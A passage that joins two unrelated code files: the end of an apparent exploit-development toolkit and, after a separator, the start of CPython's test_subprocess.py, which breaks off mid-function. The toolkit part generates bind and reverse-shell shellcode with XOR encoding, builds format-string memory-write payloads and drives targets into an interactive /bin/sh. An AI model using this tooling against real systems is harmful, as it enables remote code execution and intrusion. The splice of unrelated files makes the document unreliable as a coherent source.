return chr(0x50+r) + self.get('alnum_stager')
elif self.arch == 'x86-64':
r = ['rax', 'rcx', 'rdx', 'rbx', 'rsi', 'rdi', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15'].index(reg)
if r >= 8:
return '\x41' + chr(0x50+(r-8)) + self.get('alnum_stager')
else:
return chr(0x50+r) + self.get('alnum_stager')
else:
raise Exception("unsupported architecture: %r" % self.arch)
def bind_shell(self, port):
p = struct.pack('>H', port)
return self.get('bind_shell', port=p)
def reverse_shell(self, host, port):
addrinfo = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
h, p = addrinfo[0][4]
h = socket.inet_aton(h)
p = struct.pack('>H', p)
return self.get('reverse_shell', host=h, port=p)
def xor(self, code, badchars='\x00\t\n\v\f\r '):
for key in xrange(0x100):
decoder = self.get('xor', key=chr(key))
encoded_code = str(bytearray(c^key for c in bytearray(code)))
result = decoder + encoded_code + chr(key)
if all(c not in result for c in badchars):
return result
else:
raise Exception('xor key not found')
class FormatStr(object):
def __init__(self, offset=0):
# i386 only
self.offset = offset
def dump_stack(self, size, start=None):
buf = 'AAAA'
if start > 1:
i = start
while len(buf) < size:
buf += ".%%%d$x" % i
i += 1
else:
while len(buf) < size:
buf += '.%x'
return buf[:size]
def calc_offset(self, s):
return s.split('.').index('41414141')
def gets(self, addr):
buf = p32(addr)
buf += "%%%d$s" % self.offset
return buf
def write4(self, addr, value):
if addr % 0x10 == 0x8:
# skip \x0a
buf = p32([addr, addr+1, addr+3])
n = [value & 0xFF, (value >> 8) & 0xFFFF, (value >> 24) & 0xFF]
n[2] = ((n[2]-n[1]-1) % 0x100) + 1
n[1] = ((n[1]-n[0]-1) % 0x10000) + 1
n[0] = ((n[0]-len(buf)-1) % 0x100) + 1
buf += "%%%dc%%%d$hhn" % (n[0], self.offset)
buf += "%%%dc%%%d$hn" % (n[1], self.offset+1)
buf += "%%%dc%%%d$hhn" % (n[2], self.offset+2)
else:
buf = p32([addr, addr+1, addr+2, addr+3])
n = map(ord, p32(value))
n[3] = ((n[3]-n[2]-1) % 0x100) + 1
n[2] = ((n[2]-n[1]-1) % 0x100) + 1
n[1] = ((n[1]-n[0]-1) % 0x100) + 1
n[0] = ((n[0]-len(buf)-1) % 0x100) + 1
buf += "%%%dc%%%d$hhn" % (n[0], self.offset)
buf += "%%%dc%%%d$hhn" % (n[1], self.offset+1)
buf += "%%%dc%%%d$hhn" % (n[2], self.offset+2)
buf += "%%%dc%%%d$hhn" % (n[3], self.offset+3)
return buf
class Proc(object):
def __init__(self, *args, **kwargs):
self.timeout = kwargs.get('timeout', 0.1)
self.display = kwargs.get('display', False)
self.debug = kwargs.get('debug', False)
if 'host' in kwargs and 'port' in kwargs:
self.s = socket.create_connection((kwargs['host'], kwargs['port']))
else:
self.s = self.connect_process(args)
self.s.setblocking(0)
def connect_process(self, cmd):
def run_server(s, e, cmd):
c, addr = s.accept()
s.close()
try:
p = Popen(cmd, stdin=c, stdout=c, stderr=c, preexec_fn=lambda: os.setsid())
except Exception as err:
c.close()
e.set()
raise err
if self.debug:
raw_input("\x1b[32mpid %d is running, attach the debugger if needed. Hit enter key to continue...\x1b[0m" % p.pid)
e.set()
p.wait()
c.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 0)) # INADDR_ANY, INPORT_ANY
s.listen(1)
e = Event()
t = Thread(target=run_server, args=(s, e, cmd))
t.daemon = True
t.start()
c = socket.create_connection(s.getsockname())
e.wait()
return c
def write(self, s):
select.select([], [self.s], [])
self.s.sendall(s)
if self.display:
printable = re.sub(r'[^\s\x20-\x7e]', '.', s)
sys.stdout.write("\x1b[33m%s\x1b[0m" % printable) # yellow
sys.stdout.flush()
def read(self, size=-1, timeout=-1):
if size < 0:
chunk_size = 8192
buf = ''
while True:
chunk = self.read(chunk_size, timeout)
buf += chunk
if len(chunk) < chunk_size:
break
return buf
if timeout < 0:
timeout = self.timeout
buf = ''
while len(buf) < size:
rlist, wlist, xlist = select.select([self.s], [], [], timeout)
if not rlist:
break
chunk = self.s.recv(size-len(buf))
if not chunk:
break
buf += chunk
if self.display:
printable = re.sub(r'[^\s\x20-\x7e]', '.', buf)
sys.stdout.write("\x1b[36m%s\x1b[0m" % printable) # cyan
sys.stdout.flush()
return buf
def read_until(self, s):
buf = self.read(len(s), None)
while not buf.endswith(s):
buf += self.read(1, None)
return buf
def expect(self, regexp):
buf = ''
m = None
while not m:
buf += self.read(1, None)
m = re.search(regexp, buf)
return m
def readline(self):
return self.read_until('\n')
def writeline(self, s):
return self.write(s+'\n')
def shutdown(self, writeonly=False):
if writeonly:
self.s.shutdown(socket.SHUT_WR)
else:
self.s.shutdown(socket.SHUT_RDWR)
def close(self):
self.s.close()
def interact(self, shell_fd=None):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
buf = self.read()
sys.stdout.write(buf)
if shell_fd is not None:
self.write(check_cmd + '\n')
sys.stdout.write(self.read())
self.write("exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" % {'fd': shell_fd})
t = Telnet()
t.sock = self.s
t.interact()
self.shutdown()
self.close()
@contextmanager
def listen(self, port=0, is_shell=False):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.listen(1)
yield s.getsockname()
c, addr = s.accept()
s.close()
if is_shell:
c.sendall(check_cmd + '\n')
sys.stdout.write(c.recv(8192))
t = Telnet()
t.sock = c
t.interact()
c.close()
def pipe_output(self, *args):
p = Popen(args, stdin=self.s, stdout=PIPE)
stdout, stderr = p.communicate()
return stdout
def read_p64(self):
return p64(self.read(8, None))
def read_p32(self):
return p32(self.read(4, None))
def write_p64(self, s):
return self.write(p64(s))
def write_p32(self, s):
return self.write(p32(s))
class Pattern(object):
@classmethod
def generate(cls):
for x in xrange(0x41, 0x5b):
for y in xrange(0x61, 0x7b):
for z in xrange(0x30, 0x3a):
yield "%c%c%c" % (x, y, z)
@classmethod
def create(cls, size):
s = ''
for x in cls.generate():
s += x
if len(s) >= size:
return s[:size]
else:
raise Exception("size too large")
@classmethod
def offset(cls, s):
if s.startswith('0x'):
addr = int16(s)
if addr >> 32:
chunk = p64(addr)
else:
chunk = p32(addr)
else:
chunk = s
buf = ''
for x in cls.generate():
buf += x
try:
return buf.index(chunk)
except ValueError:
pass
else:
raise Exception("pattern not found")
class Asm(object):
cmd = {
'i386': {
'as': ['as', '--32', '--msyntax=intel', '--mnaked-reg', '-o'],
'objdump': ['objdump', '-M', 'intel', '-d'],
'objdump_binary': ['objdump', '-b', 'binary', '-m', 'i386', '-M', 'intel,i386', '-D'],
},
'x86-64': {
'as': ['as', '--64', '--msyntax=intel', '--mnaked-reg', '-o'],
'objdump': ['objdump', '-M', 'intel', '-d'],
'objdump_binary': ['objdump', '-b', 'binary', '-m', 'i386', '-M', 'intel,x86-64', '-D'],
},
'arm': {
'as': ['as', '-o'],
'objdump': ['objdump', '-d'],
'objdump_binary': ['objdump', '-b', 'binary', '-m', 'arm', '-D'],
},
'thumb': {
'as': ['as', '-mthumb', '-o'],
'objdump': ['objdump', '-M', 'force-thumb', '-d'],
'objdump_binary': ['objdump', '-b', 'binary', '-m', 'arm', '-M', 'force-thumb', '-D'],
},
}
@classmethod
def assemble(cls, s, arch):
if arch in cls.cmd:
cmd = cls.cmd[arch]
else:
raise Exception("unsupported architecture: %r" % arch)
with tempfile.NamedTemporaryFile(delete=False) as f:
p = Popen(cmd['as'] + [f.name], stdin=PIPE, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate(s+'\n')
if stderr:
return stderr
p = Popen(cmd['objdump'] + ['-w', f.name], stdout=PIPE)
stdout, stderr = p.communicate()
result = ''.join(stdout.splitlines(True)[7:])
os.remove(f.name)
return result
@classmethod
def disassemble(cls, blob, arch):
if arch in cls.cmd:
cmd = cls.cmd[arch]
else:
raise Exception("unsupported architecture: %r" % arch)
with tempfile.NamedTemporaryFile() as f:
f.write(blob)
f.flush()
if arch in ('arm', 'thumb'):
p = Popen(cmd['objdump_binary'] + ['-EB', '-w', f.name], stdout=PIPE)
else:
p = Popen(cmd['objdump_binary'] + ['-w', f.name], stdout=PIPE)
stdout, stderr = p.communicate()
result = ''.join(stdout.splitlines(True)[7:])
return result
def exit_with_usage(format_str):
print >>sys.stderr, format_str % sys.argv[0]
sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) < 2:
exit_with_usage("Usage: python %s [checksec|pc|po|gadget|scan|sc|asm|objdump] ...")
cmd = sys.argv[1]
if cmd == 'checksec':
if len(sys.argv) < 3:
exit_with_usage("check security features\n\nUsage: python %s checksec FILE")
fpath = sys.argv[2]
ELF(fpath).checksec()
elif cmd == 'pc':
if len(sys.argv) < 3:
exit_with_usage("create Metasploit pattern\n\nUsage: python %s pc SIZE")
size = int(sys.argv[2])
print Pattern.create(size)
elif cmd == 'po':
if len(sys.argv) < 3:
exit_with_usage("calculate offset in Metasploit pattern\n\nUsage: python %s po <ADDRESS|STRING>")
print Pattern.offset(sys.argv[2])
elif cmd == 'gadget':
if len(sys.argv) < 3:
exit_with_usage("check availability of tiny gadgets\n\nUsage: python %s gadget FILE")
fpath = sys.argv[2]
ROP(fpath).list_gadgets()
elif cmd == 'scan':
if len(sys.argv) < 4:
exit_with_usage("grep the binary and disassemble from each index\n\nUsage: python %s scan REGEXP FILE")
regexp = sys.argv[2]
fpath = sys.argv[3]
ROP(fpath).scan_gadgets(regexp)
elif cmd == 'sc':
if len(sys.argv) < 3:
exit_with_usage("output shellcode as hexstring\n\nUsage: python %s sc ARCH/NAME [ARG...]")
arch, name = sys.argv[2].split('/', 1)
args = [int(x) if x.isdigit() else x for x in sys.argv[3:]]
s = getattr(Shellcode(arch), name).__call__(*args)
print ''.join("\\x%02x" % ord(x) for x in s)
elif cmd == 'asm':
if len(sys.argv) < 3:
exit_with_usage("assemble/disassemble input (i386/x86-64/arm/thumb2)\n\nUsage: python %s asm [-d] ARCH")
if sys.argv[2] == '-d' and len(sys.argv) > 3:
arch = sys.argv[3]
data = sys.stdin.read()
if re.search(r'^[\s\dA-Fa-f]*$', data):
data = ''.join(data.split()).decode('hex')
print Asm.disassemble(data, arch).rstrip()
else:
arch = sys.argv[2]
data = sys.stdin.read()
print Asm.assemble(data, arch).rstrip()
elif cmd == 'objdump':
if len(sys.argv) < 3:
exit_with_usage("disassemble with IDA-like annotations\n\nUsage: python %s objdump FILE")
fpath = sys.argv[2]
ELF(fpath).objdump()
else:
exit_with_usage("Usage: python %s [checksec|pc|po|gadget|scan|sc|asm|objdump] ...")
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
